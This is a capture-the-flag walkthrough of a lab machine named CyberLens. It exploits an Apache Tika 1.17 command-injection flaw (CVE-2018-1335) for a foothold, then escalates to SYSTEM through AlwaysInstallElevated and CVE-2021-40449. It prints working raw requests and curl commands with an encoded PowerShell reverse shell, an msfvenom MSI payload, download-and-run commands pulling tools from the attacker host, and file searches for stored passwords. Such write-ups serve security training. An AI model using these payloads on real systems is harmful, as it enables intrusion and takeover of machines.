CyberLens
Can you exploit the CyberLens web server and discover the hidden flags?
This work by Manav G Krishna is licensed under CC BY-NC 4.0 
Machine IP: 10.10.131.149
Nmap Scan:
nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn
Nmap scan report for cyberlens.thm (10.10.131.149)
Host is up (0.15s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Issuer: commonName=CyberLens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-17T05:04:27
| Not valid after: 2024-11-16T05:04:27
| MD5: 0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb
|_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T05:18:33+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
61777/tcp open http Jetty 8.y.z-SNAPSHOT
| http-methods:
| Supported Methods: POST GET PUT OPTIONS HEAD
|_ Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/18%OT=80%CT=1%CU=30699%PV=Y%DS=2%DC=T%G=Y%TM=6648
OS:3A2F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=104%GCD=1%ISR=105%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=105%TI
OS:=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=2%ISR=106%TI=I%CI=I%II=I%SS=S%TS=U
OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%
OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D
OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-18T05:18:36
|_ start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 148.60 ms 10.11.0.1
2 149.53 ms cyberlens.thm (10.10.131.149)
Let us add cyberlens.thm to the hosts file as mentioned in the description of the room.
Command:
sudo echo '10.10.131.149 cyberlens.thm' >> /etc/hostsInstead of waiting for the scan to complete fully, we can navigate to the website on port 80. As the verbose switch is being used in the Nmap command, we will straight away be able to see the ports as and when it is found.
Checking out Port 80:
We can see what Wappalyzer tells us:
The web server running is Apache 2.4.57.
We have a contact form here:
Testing out a basic XSS Payload:
Now let's set up a netcat listener on port 80. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The IP specified in the payload is the tun0 interface IP.
But unfortunately we don't get any connection on the listener.
Nothing out of the blue was found while directory busting. No results were yielded from VHOST busting.
There is a feature on the site called, CyberLens Image Extractor :
Basically we can upload files and the feature fetches the metadata present within those files. Metadata is the hidden data that accompanies every image, video, and file you encounter.
Checking out this feature by intercepting the request in BurpSuite:
After turning on the intercept in Burp we just have to upload a file and click on the Get Metadata button and the request will get captured in Burp :
Forward the above request and we will be on the one that we need:
This shows that the metadata extraction takes place on port 61777. We can now check out the Nmap scan that would have completed fully by now and can also check out the website on that port:
We can see that it is using Apache Tika 1.17. It is an open-source software library that detects and extracts metadata and structured text from a variety of file formats. This is what is being used to fetch the metadata from the files that we upload in the CyberLens Image Extractor feature.
We can confirm the same by looking at the metadata it extracts, mainly checking out the Parsing headers, have uploaded a pdf file this time:
And also the endpoint as seen from the request is /meta and this is where our request post clicking on Get Metadata is being sent to, data is being PUT to the server:
Now that we fully know what exactly is happening, we can try to find out exploits for - Apache Tika 1.17 and this leads us to CVE-2018-1335.
CVE-2018-1335 - Command Injection in Apache Tika:
Note:
I will be showing 3 ways to get the foothold by exploiting the above mentioned CVE. First way being doing it manually, second way via the POC (python script) and the final way via Metasploit.
Manual Exploitation to get a Reverse Shell:
Towards the end of the above attached blog, we find this:
Based on this, we have to include a a few headers , change the content-type and also have to add the JS code in the body of the request.
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');Apparently what these two JS lines are doing is, firstly it is creating a WScript.Shell object, which provides access to Windows shell functionalities. WScript is used to interpret and execute scripts written in scripting languages such as VBScript and JScript and secondly this object is being used to run the command cmd /c calc.exe, which opens up Calculator of the target machine.
The command can be modified by us to get a reverse shell instead.
Base64 Encoded PS Reverse Shell:
Setting up a listener on port 445:
Final Request:
The extra headers include:
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:JscriptAnd also the Content-Type has to be changed to image/jp2.
The request body:
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Content-Type: image/jp2
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');
The same can be done through curl too:
Command:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "Content-Type: image/jp2" \
-H 'X-Tika-OCRTesseractPath: "cscript"' \
-H 'X-Tika-OCRLanguage: //E:Jscript' \
--data '
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('\''cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='\'');
'We just send the request and we can check out the listener:
Now we have successfully got a shell as the user cyberlens and we can get the user flag in this user's Desktop folder.
Using POC to get a Reverse Shell:
Command:
python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='The Base64 Encoded PS Payload is what is being used here too.
We have now got the shell:
Using Metasploit:
Command:
msfconsole -q //This starts metasploit in quite mode, that is it doesn't print out the banner
Setting the options:
Running systeminfo from the shell that we previously got from the above mentioned ways, gives us the type:
Command:
systeminfo | findstr /B /C:"System Type"
It is a 64-bit machine. So while setting the payload option we would have to set a 64-bit payload.
Now we just run the exploit:
Yet again, we have a shell.
Let us see if we can do some enumeration and find if passwords of any users are stored in files etc, which is a pretty common thing that is found in real world pentests too. Let us check out a few common file types that passwords could be stored in such as .txt, .xml, .ini etc.
We can firstly look within CyberLens's home folder
Command:
Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini
There is a file called CyberLens-Management.txt.
Let us check it out:
And indeed we find CyberLens's password.
Also the Nmap scan shows us that port 3389 is open. Let us confirm we if can RDP in as CyberLens:
Command:
netexec rdp cyberlens.thm -u CyberLens -p 'insert_password'
NetExec says Pwn3d!. This means the creds are valid and we can RDP in.
Note:
RDP ing is not needed considering we already have a shell as CyberLens. Below shown are the steps to follow if you want to try it out.
Command:
xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution
We have got in.
Privilege Escalation to SYSTEM (Intended Way):
We can firstly check if Windows Defender is running or not:
Command:
sc.exe query WinDefend
We can see that the STATE is STOPPED, which means Defender is not runnning.
Now let us use WinPEAS on the machine by serving it via a python server and a 64-bit WinPEAS is what we need as the target system is 64-bit .
We can write to the home folder or Desktop folder of the user CyberLens as we have Full Control (F) in these locations:
Command:
IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe
Running WinPEAS:
We then come across this:
We can see that the AlwaysInstallElevated Policy is set to 1 (Enabled) for both HKLM (HKEY_LOCAL_MACHINE) & HKCU (HKEY_CURRENT_USER) registry hives. This policy allows non-administrative users to install software with elevated privileges. In this case it is enabled globally (for all users) as well as for the current user on the system.
This policy allows a regular user to install MSI files with high/elevated privileges.
Manually enumerating the status of AlwaysInstallElevated:
Commands:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
This can be abused by us in order to escalate privileges to become SYSTEM by crafting a malicious MSI file.
We can create a .msi payload using msfvenomand this can be served via a python server.
Command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi
Command:
IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi
Now let us setup a listener on port 443:
Running the bad MSI file:
Command:
msiexec.exe /i evil.msi
Now let us check out our listener:
We have successfully got a shell as SYSTEM. The admin flag can be found in the Desktop folder of Administrator.
The same can be done via Metasploit too (exploit/windows/local/always_install_elevated).
Privilege Escalation to SYSTEM (Unintended Way):
Let us check out the OS Version on the machine:
Command:
systeminfo | findstr /B /C:"OS Version"
It is 10.0.17763 N/A Build 17763. We can now check out exploits for the same
And we get this in one of the results:
It is a LPE (Privilege Escalation) exploit.
CVE-2021-40449 (Win32k - LPE):
We can check out the repo:
We can see that the exact version that we have on the target is vulnerable to this LPE exploit.
This can be used to get to SYSTEM.
The repo doesn't have pre-compiled binaries. The .sln file has to be compiled to an .exe file and this can be achieved by using Visual Studio. There are other ways to do it too, but it is a lengthy procedure. Instead we can exploit this in an easier way using Metasploit.
Note:
We can use the meterpreter shell that we had got by exploiting the Apache Tika CVE initially to run the above mentioned LPE exploit or we can use the web_delivery exploit in the shell that we got by manually exploiting the Tika CVE. The easier and the more practical way of getting a meterpreter shell would be through web_delivery. But in this case since we have a meterpreter shell from before, I will be using that as it is a shell obtained in the context of this machine and mainly cause you have the option to choose which way you would like to follow to get to SYSTEM. Also for the LPE exploit, a couple repo's containing the pre built binary was found but they didn't work.
Getting the shell as CyberLens by exploiting CVE-2018-1335:
CVE-2021-40449 Exploitation:
The initial meterpreter shell is backgrounded (bg) so that it can be used with the exploit.
Setting the options:
We have to firstly set the SESSION, which is basically the initial shell that we had obtained. This is how the exploit module knows where to perform the LPE exploit on.
Note:
The SESSION count is 3 for me as this is the 3rd session that I have opened. This won't be the same in your case, it depends on how many sessions were opened before using the Apache Tika Metasploit exploit. Make sure to type in the meterpreter command - sessions to find out your current session ID.
We had left the LPORT to the default setting of port 4444 initially while performing the Tika exploit via Metasploit. Now we would have to use a different LPORT for the exploit to listen on, so we can set it to 5555.
Now we just run the exploit:
We are SYSTEM again.
We could also find the LPE exploit in a simpler way through the meterpreter shell itself by using Metasploit's Lester (Local Exploit Suggester):
This module scans the system and it finds and lists out possible vulnerabilities.
Command:
run post/multi/recon/local_exploit_suggester
Note:
All exploits mentioned by the suggester were tried out but the only one that worked was CVE-2021-40449. Also there are multiple post exploitation recon tools like Lester that yields the same result as shown above.
Room solved!!
Last updated